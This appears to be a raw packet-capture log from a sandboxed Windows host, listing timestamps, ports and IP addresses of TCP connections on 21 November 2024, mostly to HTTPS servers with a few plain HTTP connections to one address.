Nov 21, 2024 22:13:06.444036961 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.444124937 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.444206953 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.444761992 CET	49977	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.444785118 CET	443	49977	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.631592035 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:06.631977081 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:06.631997108 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:06.633666992 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:06.633744001 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:06.634924889 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:06.635021925 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:06.635181904 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:06.635202885 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:06.646352053 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.646651983 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.646717072 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.649837971 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.649945974 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.650918007 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.651000977 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.651071072 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.653968096 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.654618025 CET	49987	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:06.654778957 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.654800892 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.655810118 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.655865908 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.656183958 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.656255007 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.656331062 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.656341076 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.663533926 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.663572073 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.663981915 CET	443	49983	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.664057970 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.664057970 CET	49983	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.682095051 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:06.689508915 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.689805031 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.689811945 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.690779924 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.690839052 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.691231966 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.691293955 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.691437006 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.691442013 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.712987900 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.713067055 CET	443	49984	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.713144064 CET	49984	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.774332047 CET	80	49987	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:06.775091887 CET	49987	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:06.775394917 CET	49987	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:06.789163113 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.881259918 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.881337881 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.881462097 CET	443	49982	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.881522894 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.881541014 CET	49982	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.895070076 CET	80	49987	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:06.931910038 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.931965113 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.932368040 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.932410955 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.932413101 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.932456970 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.933583975 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.933600903 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:06.933835983 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.933851957 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.132801056 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:07.132998943 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:07.133059978 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:07.136852980 CET	49980	443	192.168.2.5	94.245.104.56
Nov 21, 2024 22:13:07.136893034 CET	443	49980	94.245.104.56	192.168.2.5
Nov 21, 2024 22:13:07.245181084 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.245228052 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.245320082 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.245521069 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.245588064 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.245649099 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.245923042 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.245934010 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.246166945 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.246184111 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.259516954 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.259543896 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.259624958 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.260041952 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.260082006 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.260138035 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.260308027 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.260319948 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.260437965 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.260448933 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.344758034 CET	443	49942	142.250.181.100	192.168.2.5
Nov 21, 2024 22:13:07.344827890 CET	49942	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:07.803666115 CET	443	49945	142.250.181.100	192.168.2.5
Nov 21, 2024 22:13:07.803771973 CET	49945	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:07.818696976 CET	443	49944	142.250.181.100	192.168.2.5
Nov 21, 2024 22:13:07.818941116 CET	49944	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:07.931215048 CET	443	49946	142.250.181.100	192.168.2.5
Nov 21, 2024 22:13:07.939054966 CET	49946	443	192.168.2.5	142.250.181.100
Nov 21, 2024 22:13:08.145484924 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.146017075 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.146034002 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.146703005 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.147227049 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.147336960 CET	443	49990	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.148399115 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:08.148433924 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:08.148802042 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:08.149296999 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:08.149307966 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:08.205435991 CET	80	49987	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:08.205527067 CET	49987	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:08.238296986 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.239656925 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.239677906 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.241389990 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.241537094 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.243000031 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.243146896 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.289849997 CET	49990	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.338999033 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.339026928 CET	443	49991	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.438996077 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:08.439037085 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:08.439326048 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:08.439570904 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:08.439580917 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:08.455876112 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.456487894 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.456518888 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.457382917 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.457663059 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.457770109 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.457815886 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.468699932 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.469168901 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.469180107 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.470160007 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.470259905 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.470748901 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.470813036 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.485181093 CET	49991	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.503215075 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.503648043 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.503660917 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.505096912 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.505263090 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.505842924 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.505920887 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.518156052 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.523015976 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.523039103 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.526931047 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.527447939 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.527447939 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.527637005 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.587023020 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.587090969 CET	443	49994	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.647057056 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.647057056 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.647059917 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.647068977 CET	443	49996	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.647073984 CET	443	49995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.647085905 CET	443	49993	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.784940004 CET	49994	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.847431898 CET	49996	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.847467899 CET	49995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.851061106 CET	49993	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.633285046 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.635353088 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:09.635369062 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.635840893 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.635863066 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.635915041 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:09.635922909 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.635967970 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:09.636591911 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.640193939 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:09.640263081 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.640393972 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:09.640400887 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:09.711888075 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:09.713414907 CET	49987	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:09.713490009 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:09.713510990 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:09.713641882 CET	50010	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:09.715078115 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:09.715153933 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:09.716141939 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:09.716227055 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:09.788609982 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:09.788614035 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:09.788638115 CET	443	50005	104.126.116.98	192.168.2.5
Nov 21, 2024 22:13:09.833218098 CET	80	50010	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:09.833312988 CET	50010	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:09.833329916 CET	80	49987	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:09.833395004 CET	49987	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:09.834914923 CET	50010	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:13:09.887408018 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887485027 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:09.887542963 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887574911 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:09.887602091 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887630939 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887772083 CET	50011	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887794018 CET	443	50011	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:09.887866974 CET	50012	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887888908 CET	443	50012	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:09.954390049 CET	80	50010	185.215.113.43	192.168.2.5
Nov 21, 2024 22:13:09.978260040 CET	50005	443	192.168.2.5	104.126.116.98
Nov 21, 2024 22:13:10.089029074 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.089080095 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.089119911 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.089143038 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.097414017 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.097755909 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.097764969 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.114113092 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.114221096 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.114243031 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.114253044 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.114289999 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.122430086 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.130743980 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.130827904 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.130855083 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.130865097 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.130898952 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.139189959 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.147922039 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.147970915 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.147979021 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.206748962 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.206816912 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.206828117 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.288438082 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.288454056 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.291415930 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.291546106 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.291553020 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.301045895 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.301120996 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.301129103 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.308161974 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.308249950 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.308257103 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.315191031 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.315327883 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.315337896 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.322376013 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.322460890 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.322474957 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.336231947 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.336353064 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.336405039 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.336414099 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.336494923 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.343363047 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.348263979 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.348316908 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.348325014 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.352694035 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.352744102 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.352750063 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.357475996 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.357731104 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.357738018 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.362029076 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.362157106 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.362169027 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.371392012 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.371440887 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.371449947 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.376008987 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.376060963 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.376068115 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.380811930 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.380872011 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.380882025 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.385385036 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.385442019 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.385449886 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.407500982 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.407569885 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.407578945 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.489938974 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.489964008 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.489978075 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.490076065 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.490082979 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.494040012 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.494091988 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.494101048 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.501959085 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.502006054 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.502015114 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.505835056 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.505886078 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.505894899 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.509524107 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.509593964 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.509601116 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.513245106 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.513303995 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.513313055 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.517007113 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.517061949 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.517074108 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.520167112 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.520236969 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.520246029 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.527015924 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.527074099 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.527084112 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.530508041 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.530591965 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.530648947 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.530659914 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.530702114 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.534018040 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.537466049 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.537534952 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.537547112 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.539747000 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.539803028 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.539812088 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.542186975 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.542238951 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.542253971 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.544425011 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.544534922 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.544542074 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.546845913 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.546958923 CET	50002	443	192.168.2.5	142.251.35.161
Nov 21, 2024 22:13:10.546967030 CET	443	50002	142.251.35.161	192.168.2.5
Nov 21, 2024 22:13:10.551373959 CET	443	50002	142.251.35.161	192.168.2.5
